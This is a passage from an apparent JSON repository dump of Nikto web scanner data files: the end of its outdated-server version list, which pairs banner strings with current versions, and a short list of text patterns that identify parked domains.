appears to be outdated (current is at least @CURRENT_VER)\"\n\"601041\",\"Beacon/\",\"3.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601042\",\"Asterisk/\",\"1.8.5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601043\",\"BinarySEC/\",\"3.1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601044\",\"CentileEmbeddedHTTPSdserver/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601046\",\"cPNginx.Co/\",\"0.8.5.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601047\",\"Dahlia/\",\"1.0.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601048\",\"DataONTAP/\",\"7.3.2P7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601049\",\"Formilux/\",\"0.1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601050\",\"gunicorn/\",\"0.14.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601051\",\"HBS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601052\",\"HOJ-WebServer/\",\"0.2.11\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601053\",\"HTTPProxy/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601054\",\"ipOS/\",\"7.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601055\",\"IQhttpD/\",\"1.007oct2007\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601056\",\"JavaPseudoHttpd/\",\"0.4.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601057\",\"LiveCache/\",\"2.4a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601058\",\"LuCId-HTTPd/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601059\",\"m4vh/\",\"1.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601060\",\"mini-http/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601061\",\"nCore/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601062\",\"NetworkActiv-Web-Server/\",\"3.5.16\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601063\",\"nginxvta/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601064\",\"Noelios-Restlet-Engine/\",\"1.0rc3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601065\",\"OwilAppserv/\",\"1.30\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601066\",\"PHP5/\",\"5.6.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). PHP 5.5.18, 5.4.34 and 5.3.29 are also current.\"\n\"601067\",\"POSIXDLNADOC/\",\"1.50UPnP/1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601068\",\"qjy168/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601069\",\"Rocket1.0.6aPython/\",\"2.6.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601070\",\"SAPNetWeaverApplicationServer/\",\"ABAP701\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601072\",\"TembriaWebServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601073\",\"TongWebApplicationServer/\",\"4.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601074\",\"TUNIX-httpscreen/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601075\",\"TwistedWeb/\",\"11.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601076\",\"uhttpd/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601077\",\"UltiDevCassini/\",\"2.1.4.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601078\",\"WebMod/\",\"0.48\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601079\",\"xrl-thttpd/\",\"2.25b08jan2011\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601080\",\"PanWebServer/\",\"2.4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601081\",\"mod_put/\",\"2.0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601082\",\"mod_qos/\",\"11.64\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601083\",\"ScriptLogic.Webserver/\",\"8.0.0.440\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601084\",\"Phusion Passenger/\",\"4.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601085\",\"Zope/\",\"(Zope/2.13.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601086\",\"DMRND/\",\"0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601087\",\"HelixMobileServer\\/\",\"14.3.0.268\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601088\",\"JoostNRG/\",\"0.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601089\",\"KDH\\/\",\"6100.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601090\",\"mod_cntr\\/\",\"2.5.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601091\",\"mod_nss\\/\",\"2.4.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601092\",\"mod_spy\\/\",\"1.3.24\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601093\",\"Mundu\\/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601094\",\"OmnitureDC\\/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601095\",\"PPEngine\\/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601096\",\"SouthRiver\\/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601097\",\"Sun-ILOM-Web-Server\\/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601098\",\"uc-httpd\\/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601099\",\"ymweb\\/\",\"1.5.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601100\",\"ZhihuServer\\/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601101\",\"GlassFish Server Open Source Edition \",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601102\",\"JPMC\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601103\",\"Rehwork Webserver \",\"v7.3b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601104\",\"TUNHS \",\"v.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601105\",\"TVP Portal \",\"3.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601106\",\"Viajeros2-\",\"ECFE4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601107\",\"Xtransform-\",\"0.1.1-beta\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601108\",\"tws\",\"0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601109\",\"IWS/\",\"2.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601110\",\"Moo/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601111\",\"mod_apreq2-20090110/\",\"2.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601112\",\"mod_fastcgisa/\",\"2.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601113\",\"LMLmod_ssl/\",\"2.8.31\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601114\",\"37wan/\",\"9.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601115\",\"3fe/\",\"2.7.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601116\",\"ATS/\",\"3.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601117\",\"AderleeWebPortal/\",\"7.0.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601118\",\"ArcWS/\",\"4.0.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601119\",\"AtyponWS/\",\"7.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601120\",\"BSWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601121\",\"BWM/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601122\",\"Become/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601123\",\"BlueDragonServer/\",\"7.1.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601124\",\"CHINACACHE/\",\"CCN-BJ-3-57J\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601125\",\"CPC/\",\"2.2.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601126\",\"CWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601127\",\"ClaraPXWebv2.1/\",\"FMAK\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601128\",\"CloobFramework/\",\"1.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601129\",\"Cnaws/\",\"1.0.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601130\",\"ComsenzWS/\",\"1.0.00\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601131\",\"DDWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601132\",\"DHNWS/\",\"2.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601133\",\"DME/\",\"2.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601134\",\"DMS/\",\"1.0.42\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601135\",\"DZSERVER/\",\"0.1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601136\",\"DayServletEngine/\",\"4.1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601137\",\"Dict/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601138\",\"FWS/\",\"7.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601139\",\"FlightAware/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601140\",\"FreeFind/\",\"8.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601141\",\"FriendFeedServer/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601142\",\"GNWS/\",\"0.7.42\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601143\",\"GWS-GRFE/\",\"0.50\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601144\",\"Geobytes-GeoSelect/\",\"3.0.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601145\",\"Haaretz/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601146\",\"HavenServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601147\",\"IAGR/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601148\",\"IBM_HTTP_SERVER/\",\"1.3.28\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601149\",\"Inyoka/\",\"rev-5723\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601150\",\"JWS/\",\"2010\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601151\",\"Jrun/\",\"4.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601152\",\"KA/\",\"0.03\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601153\",\"KYOWS/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601154\",\"Kerio_WebSTAR/\",\"5.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601156\",\"LOVE/\",\"4_3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601157\",\"Lucy-HTTPd/\",\"2.2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601158\",\"MII-WSD/\",\"1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601159\",\"MWS/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601160\",\"Meishi/\",\"1.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601161\",\"MobileAware-MF/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601164\",\"NWS/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601165\",\"OKWS/\",\"3.1.4.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601166\",\"Ocamlnet/\",\"2.2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601167\",\"OmnitureAWS/\",\"2.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601168\",\"On-DemandRouter/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601169\",\"PEARLWebshop/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601170\",\"PPS/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601171\",\"PhobyxCluster/\",\"0.1.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601172\",\"PipeBoost/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601173\",\"Pizza/\",\"4cheese\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601174\",\"ROTOR/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601175\",\"RWS/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601176\",\"RapidbazLive/\",\"0.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601177\",\"RapidbazLiveFW/\",\"0.07\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601178\",\"Rediff/\",\"2.0.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601179\",\"Safe3WAF/\",\"6.4.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601180\",\"IBM WebSphere sMash/\",\"1.1.1.6.141217\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601181\",\"SmugMug/\",\"0.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601182\",\"Snowball/\",\"5.2a\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601184\",\"TinyURL/\",\"1.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601185\",\"UPWS/\",\"9.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601186\",\"USF-11/\",\"155\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601187\",\"UWS/\",\"0.17\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601188\",\"UltraBrutalServer/\",\"7.6112\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601189\",\"VXS/\",\"3.38\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601191\",\"W3TotalCache/\",\"0.9.1.4b\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601192\",\"WebGUI/\",\"7.4.20\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601193\",\"WebMatrixiDCHTTPServer/\",\"8.0.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601194\",\"YEEPAY-WBS/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601195\",\"YJSWS/\",\"0.8.53\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601196\",\"YLS/\",\"0.15\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601197\",\"YServer/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601198\",\"YWS/\",\"2010\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601199\",\"ZSWS/\",\"2.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601200\",\"ZendCore/\",\"2.5.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601201\",\"ZendServer/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601202\",\"alabout/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601203\",\"aliBeacon/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601204\",\"barista/\",\"3.3.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601205\",\"ddspn/\",\"0.8.34\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601206\",\"emuch/\",\"2010\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601207\",\"ezot/\",\"3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601208\",\"follow5/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601209\",\"gevent/\",\"0.13\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601210\",\"iPad/\",\"8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601211\",\"ibibo-WS/\",\"2.2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601212\",\"iptoXGmbHHPC5/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601213\",\"k\\!/\",\"45.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601214\",\"kzserver/\",\"1.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601215\",\"magic_ponies/\",\"2.718\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601216\",\"mcdn/\",\"1.alpha\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601217\",\"mod_AliCookie/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601218\",\"mod_chxj/\",\"0.12.35\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601219\",\"mod_cinemark/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601220\",\"mod_defensible/\",\"1.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601221\",\"mod_evasive/\",\"2.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601223\",\"mod_onsint/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601224\",\"mod_ossl/\",\"10.1.3.0.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601225\",\"mod_rsp20/\",\"rsp_plugins_v15.08-07-29\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601226\",\"mod_security2/\",\"2.5.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601227\",\"mod_ucam_webauth/\",\"1.4.2\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601228\",\"mru_xml/\",\"0.471\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601229\",\"naukri.comnginx/\",\"0.7.62\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601230\",\"nfzmX/\",\"700607\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601231\",\"nginx-adamantsys/\",\"0.7.67\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601232\",\"nginx-catap/\",\"0.8.7.528.179136c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601233\",\"proxy_xml/\",\"0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601234\",\"prxp_module/\",\"1.12.28\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601235\",\"psso_module/\",\"0.9.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601236\",\"pxg2_module/\",\"0.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601237\",\"qip.mail/\",\"4.1.2120328.01.2011\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601238\",\"rackcorpcdn/\",\"1.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601239\",\"sws/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601240\",\"uloztows/\",\"1.26.19\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601241\",\"xingyun/\",\"0.8.88\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601242\",\"yy365/\",\"0.8.88\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601243\",\"OwnServer\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601244\",\"MobileAdmin/\",\"7.0.15609\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601245\",\"ClearSCADA/\",\"6.71.4165.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601246\",\"Zscaler/\",\"3.4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601247\",\"comForteSWAPWebServer/\",\"SLD_1055\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601248\",\"corpweb/\",\"3.3a.QEL4\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601249\",\"CouchDB/\",\"1.0.2(ErlangOTP/R14B)\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601250\",\"FreeBSDHost-WebServer/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601252\",\"ISYSSearchServer/\",\"9.5\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601253\",\"MLDonkey/\",\"3.0.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601254\",\"mod_hive/\",\"1.10\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601255\",\"MX4J-HTTPD/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601256\",\"Speedr/\",\"0.8.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601257\",\"Apache-ADTI/\",\"1.3.41\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601258\",\"EvoWebBase/\",\"1.8\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601259\",\"Mohican/\",\"127.0.0.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601260\",\"NetJetEngine/\",\"2.29646EB013568\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601261\",\"OCP/\",\"1.3.27\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601262\",\"Progressive/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601263\",\"River/\",\"2.14\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601264\",\"SiteWelder/\",\"5.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601265\",\"SmallWebServer/\",\"2.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601266\",\"VWS/\",\"3.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601267\",\"WebContainer/\",\"4.2.4.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601268\",\"mod_auth_gforge/\",\"0.5.9.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601269\",\"mod_extfilter/\",\"1.3\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601271\",\"mod_pwdir/\",\"1.0\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601272\",\"mod_security/\",\"1.8.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601273\",\"mod_suid/\",\"1.1\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601274\",\"srp/\",\"2.c\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER)\"\n\"601275\",\"Jetty/\",\"9.4.20.v20190813\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Jetty 9.2.14.v20151106, 8.1.17.v20150415 and 7.6.17.v20150415 are also current.\"\n\"601276\",\"Jetty\\(\",\"9.4.20.v20190813\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER). Jetty 9.2.14.v20151106, 8.1.17.v20150415 and 7.6.17.v20150415 are also current.\"\n\"601277\",\"Sawmill/\",\"8.7.7.6\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n\"601278\",\"KDH\",\"6300.7\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n\"601279\",\"Jetty/winstone-\",\"2.9\",\"@RUNNING_VER appears to be outdated (current is at least @CURRENT_VER).\"\n"
  },
  {
    "path": "nikto/program/databases/db_parked_strings",
    "content": "#VERSION,2.001\n#######################################################################\n# File Source: https://cirt.net\n# (c) 2001 Chris Sullo, All Rights Reserved.\n# This file may only be distributed and used with the full Nikto package.\n# This file may not be used with any software product without written permission from\n# Chris Sullo (csullo@gmail.com)\n#\n# Note:\n# By submitting updates to this file you are transferring any and all copyright\n# interest in the data to Chris Sullo so it can modified, incorporated into this product\n# relicensed or reused.\n#######################################################################\nparked FREE                     \t# GoDaddy\ncourtesy of GoDaddy\\.com        \t# GoDaddy\n\\?epl=                          \t# domainsponsor.com\nBelow are sponsored listings  \t\t# Google\ndoubleclick.net\\/apps\\/domainpark\t# Google\nAsia Registry                   \t# AsiaRegistry.com\nnetsolhost                      \t# Network Solutions\nSponsored Listings\t\t\t# Voodoo.com\n"
  },
  {
    "path": "nikto/program/databases/db_realms",
